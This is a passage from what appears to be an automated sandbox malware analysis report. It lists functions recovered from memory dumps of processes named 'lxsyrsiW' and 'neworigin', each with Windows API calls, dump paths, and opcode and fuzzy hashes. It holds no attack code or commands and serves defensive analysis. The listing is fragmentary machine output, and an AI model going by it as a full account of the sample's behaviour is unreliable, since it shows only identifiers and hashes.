                                                                                                                • GetLastError.KERNEL32(00000008,?,?,100415D8,10043CBB,?,10041D2A,?,?,00000000), ref: 100418E4
                                                                                                                • _free.LIBCMT ref: 10041919
                                                                                                                • _free.LIBCMT ref: 10041940
                                                                                                                • SetLastError.KERNEL32(00000000,?,10041D2A,?,?,00000000), ref: 1004194D
                                                                                                                • SetLastError.KERNEL32(00000000,?,10041D2A,?,?,00000000), ref: 10041956
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170660625-0
                                                                                                                • Opcode ID: 27218d39151a1fb8a4c47cba335538c8ab679a51337d85444a7a2546c0b347db
                                                                                                                • Instruction ID: 298917bf2bf5f65f3e66c2e4742617b20304a4e795e88abd634da0b038b75747
                                                                                                                • Opcode Fuzzy Hash: 27218d39151a1fb8a4c47cba335538c8ab679a51337d85444a7a2546c0b347db
                                                                                                                • Instruction Fuzzy Hash: C701F43B3046127BE312D7709D95AAB16EEDBC62B47720139FA14E2253FA758C82402C
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 10043189
                                                                                                                  • Part of subcall function 10042096: HeapFree.KERNEL32(00000000,00000000,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?), ref: 100420AC
                                                                                                                  • Part of subcall function 10042096: GetLastError.KERNEL32(?,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?,?), ref: 100420BE
                                                                                                                • _free.LIBCMT ref: 1004319B
                                                                                                                • _free.LIBCMT ref: 100431AD
                                                                                                                • _free.LIBCMT ref: 100431BF
                                                                                                                • _free.LIBCMT ref: 100431D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 7391c506bee86009a89ae6c8a61ca8a829215e2667859e320e20c9ec1ca5e9ca
                                                                                                                • Instruction ID: 9ba6a6cbad0a28da5a5dfaf1b7a119aeefcbeabe35988339130f8bcf59d7326a
                                                                                                                • Opcode Fuzzy Hash: 7391c506bee86009a89ae6c8a61ca8a829215e2667859e320e20c9ec1ca5e9ca
                                                                                                                • Instruction Fuzzy Hash: 50F06DB16402109BD674DB68E9C2C1B73EAFA402507B09829F44AD7622CB70FC808A68
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 1004354C
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100435D5
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100435E7
                                                                                                                • __freea.LIBCMT ref: 100435F0
                                                                                                                  • Part of subcall function 100432FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 1004332C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                • Opcode ID: 891f923397d8f86d33f5a117b0420deb6528402b7108c8e421098af4ced467dc
                                                                                                                • Instruction ID: 2aa596ea6af59908ffb4d6f255b0a5c66503d8d242d16512a1ecabaf7b2867fc
                                                                                                                • Opcode Fuzzy Hash: 891f923397d8f86d33f5a117b0420deb6528402b7108c8e421098af4ced467dc
                                                                                                                • Instruction Fuzzy Hash: BE318B72A0061AABDB15CF64CC86DAF7BA5EF45250F268138FC04DB250EB35DD94CBA4
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,100415D8,00000000,00000000,?,10042132,100415D8,00000000,00000000,00000000,?,10042283,00000006,FlsSetValue), ref: 100421BD
                                                                                                                • GetLastError.KERNEL32(?,10042132,100415D8,00000000,00000000,00000000,?,10042283,00000006,FlsSetValue,10056FC4,FlsSetValue,00000000,00000364,?,1004192D), ref: 100421C9
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10042132,100415D8,00000000,00000000,00000000,?,10042283,00000006,FlsSetValue,10056FC4,FlsSetValue,00000000), ref: 100421D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3177248105-0
                                                                                                                • Opcode ID: f2aaaf464d45b9438b65fa78196a39e41bb90bd4464e6c8db5a168699c1e723e
                                                                                                                • Instruction ID: e7d6c1fecf6b8ff97ee078c3166930e67945fa4432b66ad818c8390abb0b6000
                                                                                                                • Opcode Fuzzy Hash: f2aaaf464d45b9438b65fa78196a39e41bb90bd4464e6c8db5a168699c1e723e
                                                                                                                • Instruction Fuzzy Hash: 77018472741233ABD7218A68DD84A467BD8EF56BA1B720630FF15E7160D760D90186F8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 0-2276729525
                                                                                                                • Opcode ID: 6601b489c5fe1f2b58c75363fe267243a3ccaa18a185b085c328b57ccbb6e187
                                                                                                                • Instruction ID: eb34a3a4cd10a52977c289a391dc2c796010926ea19b3ab90a2e04662f1fe213
                                                                                                                • Opcode Fuzzy Hash: 6601b489c5fe1f2b58c75363fe267243a3ccaa18a185b085c328b57ccbb6e187
                                                                                                                • Instruction Fuzzy Hash: C6514A71B181469AD702EB14CA413FE77E4DB40782F308D3CF8D5CA2A9EB758CD59A4A

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:14.5%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:203
                                                                                                                Total number of Limit Nodes:27
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aa9d6f2a4f0afc2b68b04ca07a4b37ab6d6e95ab7b69519e2ec7225c730a1e5b
                                                                                                                • Instruction ID: 211ed67c91ace3250c696a6a8c135fe502f04ceac0bf054b17a63caa2f0d14f4
                                                                                                                • Opcode Fuzzy Hash: aa9d6f2a4f0afc2b68b04ca07a4b37ab6d6e95ab7b69519e2ec7225c730a1e5b
                                                                                                                • Instruction Fuzzy Hash: 4FE23730E00209CFDB64DF68C594A9DB7B2FF89310F5485AAD549EB261EB31EE85CB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e48968a9621b7548e3e37d2ae8ce675dbfa058d6463cfa6462fe7e4ee7c97bf
                                                                                                                • Instruction ID: 4383054b58f2bf87c9bf6a20f987785603f91496110026f114aa6f2e5678c654
                                                                                                                • Opcode Fuzzy Hash: 0e48968a9621b7548e3e37d2ae8ce675dbfa058d6463cfa6462fe7e4ee7c97bf
                                                                                                                • Instruction Fuzzy Hash: D8629F34B006058FDB54DB68D594BADB7F2EF84314F248469E50AEB391EB31ED86CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f95dd2c1e46a271b8fcc4bd16f38c327a38809b15543e4a0e1878ef4f5086de8
                                                                                                                • Instruction ID: b3abb92a2b6028ae88e9e842a518b3533696ab1f77c234155590ffcfc4ab5021
                                                                                                                • Opcode Fuzzy Hash: f95dd2c1e46a271b8fcc4bd16f38c327a38809b15543e4a0e1878ef4f5086de8
                                                                                                                • Instruction Fuzzy Hash: CE525E30E012098FEF64DFA8D5907ADB7B2FB85310F24852AE615EB395DA34DD81CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eb47c1ba36df36485355e3a1318646ed600448a55a1c1f756d0dde26c1b32147
                                                                                                                • Instruction ID: 2ab8e31e1225ac95b09c1299cc61ce877c4194be34148f451e81dbbf7d93f3d1
                                                                                                                • Opcode Fuzzy Hash: eb47c1ba36df36485355e3a1318646ed600448a55a1c1f756d0dde26c1b32147
                                                                                                                • Instruction Fuzzy Hash: 47328E34B012098FDB54DF68D990BAEB7B2FB88314F108529E905EB795DB31ED42CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5134f3f5ae787207d946a826d998f4e77d3c8cf49cc1e9bd6c7665bb0859ef5c
                                                                                                                • Instruction ID: b30eee52c9f8efed8f4c15370b9c71ea192d25fad878c0c3304362adb5f03a15
                                                                                                                • Opcode Fuzzy Hash: 5134f3f5ae787207d946a826d998f4e77d3c8cf49cc1e9bd6c7665bb0859ef5c
                                                                                                                • Instruction Fuzzy Hash: 4812C131E102459FDB60DB64D8847AEBBB2EF85310F248829E95ADB385DF35DC41CB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd6a22ce138ced30b7d18b877e283f7aadf34622fb982fd47e1e92e9ed1fcb4f
                                                                                                                • Instruction ID: f481d592f50da882b8b6ccda3d04acbdb52055a0cb66ad64f9a16b985feb48ff
                                                                                                                • Opcode Fuzzy Hash: fd6a22ce138ced30b7d18b877e283f7aadf34622fb982fd47e1e92e9ed1fcb4f
                                                                                                                • Instruction Fuzzy Hash: F1029E30B012068FDB54DF68D994AAEB7A2FF84314F248579E515DB395EB31EC82CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2393355171.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_2a00000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c96c31108e3ed323eaafa7ef145fb7cea3494f39b6d6a54c6399a0b569e37334
                                                                                                                • Instruction ID: e31f92dd3aff80f1b356d67cc83628e7944cc3147c3e97ad4ecc58fe7deaacb5
                                                                                                                • Opcode Fuzzy Hash: c96c31108e3ed323eaafa7ef145fb7cea3494f39b6d6a54c6399a0b569e37334
                                                                                                                • Instruction Fuzzy Hash: E2412431D043598FDB10DFAAD8447EEBBF5EF88310F14896AD504E7281DB749845CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A0EF6A), ref: 02A0F057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2393355171.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_2a00000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 497e9e64d1dfa4f70c2689e510c0d72c4726022ae6b8c3d69bfed775ff3880ca
                                                                                                                • Instruction ID: a73ededeac94771901cf8e4661e3e8062ecb1531a558435b3af7a6693983c43c
                                                                                                                • Opcode Fuzzy Hash: 497e9e64d1dfa4f70c2689e510c0d72c4726022ae6b8c3d69bfed775ff3880ca
                                                                                                                • Instruction Fuzzy Hash: 331133B1C0465A9FDB10CF9AD984B9EFBF4AF48720F10816AD818B7241D778A950CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A0EF6A), ref: 02A0F057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2393355171.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_2a00000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 2f0a2d5ff81ade80c3192cb06c3821b1f0378fa0dc59c616a382f95387cab60b
                                                                                                                • Instruction ID: e669fc822fdaf3178a6ef6c91390de942e1536d4fc0a4f6cde7227b5f12466fe
                                                                                                                • Opcode Fuzzy Hash: 2f0a2d5ff81ade80c3192cb06c3821b1f0378fa0dc59c616a382f95387cab60b
                                                                                                                • Instruction Fuzzy Hash: B31136B1C0465A8FDB20CF9AD544BEEFBF4AF48320F14826AD418B7280D7789941CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 88ba5315878002b099179cd3177d6092c8e671ab57aba83c83b22e9983791d4b
                                                                                                                • Instruction ID: 5be0a6e1e69634819d88f57b4bdcadc8f4ebc6ab57e5ec4a78c4e9528f1a4b9b
                                                                                                                • Opcode Fuzzy Hash: 88ba5315878002b099179cd3177d6092c8e671ab57aba83c83b22e9983791d4b
                                                                                                                • Instruction Fuzzy Hash: 71626C30A0021ACFDB55EB68D580A5EB7B2FF84344F248A69D105DF759EB31ED86CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d3929eea7394b6ce1853799a126f68733318f485084a27b796611cd7f19c141a
                                                                                                                • Instruction ID: fbad88619f4c987d90d99baca37b5b329b2aa555b5b19356e33c7152fbc23830
                                                                                                                • Opcode Fuzzy Hash: d3929eea7394b6ce1853799a126f68733318f485084a27b796611cd7f19c141a
                                                                                                                • Instruction Fuzzy Hash: 87414C71E006098FDF70CEA9D8C1AAFF7F2EB94310F10492AE256D7650DB30E9558B92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2f581a3a5bcd3cc9bc8aa00efca2ba080940758949f5f5b6513950a6edf3dbf3
                                                                                                                • Instruction ID: 29207ddbbd498aa0c988849a20143f8df90dd25537526cba5165b8551ff00b99
                                                                                                                • Opcode Fuzzy Hash: 2f581a3a5bcd3cc9bc8aa00efca2ba080940758949f5f5b6513950a6edf3dbf3
                                                                                                                • Instruction Fuzzy Hash: CF314932B042688FDB54EB7A88107AF7BE6AFC4310F14452AE605DB245DF709D00C7E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 39a11a1c6c5b4dcbd024fb27c9572909d4c611ca106bab9e165cc7c2e82dc39a
                                                                                                                • Instruction ID: 6faa7e714e1b01f09e8803ee3d35333231a85f296822033ac043ede012c3370b
                                                                                                                • Opcode Fuzzy Hash: 39a11a1c6c5b4dcbd024fb27c9572909d4c611ca106bab9e165cc7c2e82dc39a
                                                                                                                • Instruction Fuzzy Hash: 32417F71E0020ADFDB65DF65C84469EBBB2FF85300F20452AD505EB340EB71E946CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7fd881248398714b6ae1d6ac7bae8ca56afc5aea9749a46d71938d009ad7a2a
                                                                                                                • Instruction ID: d2a35b90d1a4eed2a987dcfdee0ba95b9f077a03d7415fb526042e1d569b112c
                                                                                                                • Opcode Fuzzy Hash: d7fd881248398714b6ae1d6ac7bae8ca56afc5aea9749a46d71938d009ad7a2a
                                                                                                                • Instruction Fuzzy Hash: 2C419F70E00249DFDB65DF65C844A9EBBB2FF85300F14452AD505EB350EBB1E846CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 374c173582455326dcdadfcf6726dd9c52fe72798870c30b590abc8f2d5aec2a
                                                                                                                • Instruction ID: 232543b914c9aa97cbfa8925f6c753cddfb2c344ee9a7d3da1cf43e8b8fb6ce2
                                                                                                                • Opcode Fuzzy Hash: 374c173582455326dcdadfcf6726dd9c52fe72798870c30b590abc8f2d5aec2a
                                                                                                                • Instruction Fuzzy Hash: 6131E130B102058FDB55AF74D4656AFBBA2BF8A210F208569D506DB391EE35CD42CBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60a62a58da1ad12b4e2d898ba6961b44e3ff53e13f1232a00096d233db1d0b9f
                                                                                                                • Instruction ID: 0a18c2d21280ab3e9e24eb1ce0461d3fbb968197672cc3c2bcfc449462cc8ba9
                                                                                                                • Opcode Fuzzy Hash: 60a62a58da1ad12b4e2d898ba6961b44e3ff53e13f1232a00096d233db1d0b9f
                                                                                                                • Instruction Fuzzy Hash: 8D31C030B10206CFDB55AB78D5646AFBBE3BF89600F204529D506DB395EE35CE42CBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a82e1748172549eede6adb5911b5ec2ede54789ac4cc92ed525a4f47905853b4
                                                                                                                • Instruction ID: 1624b475ad9c2b11ec7884d27bbacf86f0b29a0947d1d5951501cc7ca875852b
                                                                                                                • Opcode Fuzzy Hash: a82e1748172549eede6adb5911b5ec2ede54789ac4cc92ed525a4f47905853b4
                                                                                                                • Instruction Fuzzy Hash: 2F319274E102069BCB54DFA4D8A569EB7B2FF89310F10C529E906EB351DB71ED42CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1d0e3f14de1d2247d03c43028a997a030c10d68f467c611983ae6c5d32e865e
                                                                                                                • Instruction ID: 489a57100cb78f5b82998c9141a433deb3621fa19038f300fb82eda88fb0669a
                                                                                                                • Opcode Fuzzy Hash: e1d0e3f14de1d2247d03c43028a997a030c10d68f467c611983ae6c5d32e865e
                                                                                                                • Instruction Fuzzy Hash: F0318134E1020A9BCB58DFA4D8A469EB7B2FF89310F10C529E906E7351DB71ED42CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b82f30517f740f20947234567f5f7da9c82263cd42ef1c5fbe2dab284b25648c
                                                                                                                • Instruction ID: 02a9682263f9106eaef92deb8d0d757772f87a9c6aca6676bc125b0049cdbf29
                                                                                                                • Opcode Fuzzy Hash: b82f30517f740f20947234567f5f7da9c82263cd42ef1c5fbe2dab284b25648c
                                                                                                                • Instruction Fuzzy Hash: 67314F71E006098FDB60CFA9D8C16AFFBF2FB94310F24492AD256D7654DB30E9458B92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2372091256.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_f6d000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8f18fa798a8769f64455ceefc9409eb3b97238952ed01b57189938d5684b858
                                                                                                                • Instruction ID: 60c05e10cc9a969086ad10bec07e777639451db704bde5181376b7cdd63494c4
                                                                                                                • Opcode Fuzzy Hash: b8f18fa798a8769f64455ceefc9409eb3b97238952ed01b57189938d5684b858
                                                                                                                • Instruction Fuzzy Hash: 8531107550E3C49FD7078B34C9A4711BF71AF47214F1985DBD889CF1A7C26A980ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d1bd6f369517b72fe62fa3c89b41221ff73f24641724d0a7c84d7bbee20f7f0b
                                                                                                                • Instruction ID: 3656b43bdaf7f003a3bf96329358077461ab717b1b391c0ac495a4e7c1edfe0a
                                                                                                                • Opcode Fuzzy Hash: d1bd6f369517b72fe62fa3c89b41221ff73f24641724d0a7c84d7bbee20f7f0b
                                                                                                                • Instruction Fuzzy Hash: F721BF35E012159FDB00DF78D981AEEBBF5EB88310F104025E905EB344EB31DA419B90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 79e2c7540451731420b599d98c8aeb5ecc36bf5cbe54788dd3fcc2ab4c6cd392
                                                                                                                • Instruction ID: 5f4f9cfd9421fb05ecda7f7b518c6362f10829b573aafe44746e4b3ec23dca00
                                                                                                                • Opcode Fuzzy Hash: 79e2c7540451731420b599d98c8aeb5ecc36bf5cbe54788dd3fcc2ab4c6cd392
                                                                                                                • Instruction Fuzzy Hash: 0A219C75E016259FDB40DF68D981AEEB7F1EB88310F108029EA05E7340EB31EA41CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2372091256.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_f6d000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5cfce7c157d2634ff1bb58c32aae47ef82997fd1e140df6f40877584e918d9e8
                                                                                                                • Instruction ID: 1199de06e002f3e5581596a890d2df490c2e4cdbb37e7d24067fdeae1f1f5777
                                                                                                                • Opcode Fuzzy Hash: 5cfce7c157d2634ff1bb58c32aae47ef82997fd1e140df6f40877584e918d9e8
                                                                                                                • Instruction Fuzzy Hash: 2C213771A04204EFDB10DF10C9C0B26BB65FB84324F30C56DE8094B246C776D847EA61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_6870000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 66d713f92dabc328657d609df6e3daa334f2d7412eac935d81d4ead4bc03b6b8
                                                                                                                • Instruction ID: e4d97c569d4133ee1737db0a1e1880250b62c27efcd63ac00ff5e32ce7ef8e96
                                                                                                                • Opcode Fuzzy Hash: 66d713f92dabc328657d609df6e3daa334f2d7412eac935d81d4ead4bc03b6b8
                                                                                                                • Instruction Fuzzy Hash: F301B131B141500FDBA5967C9851B6FB7EACBCA720F24843AE60ECB355ED65DC0243A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.2450481400.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
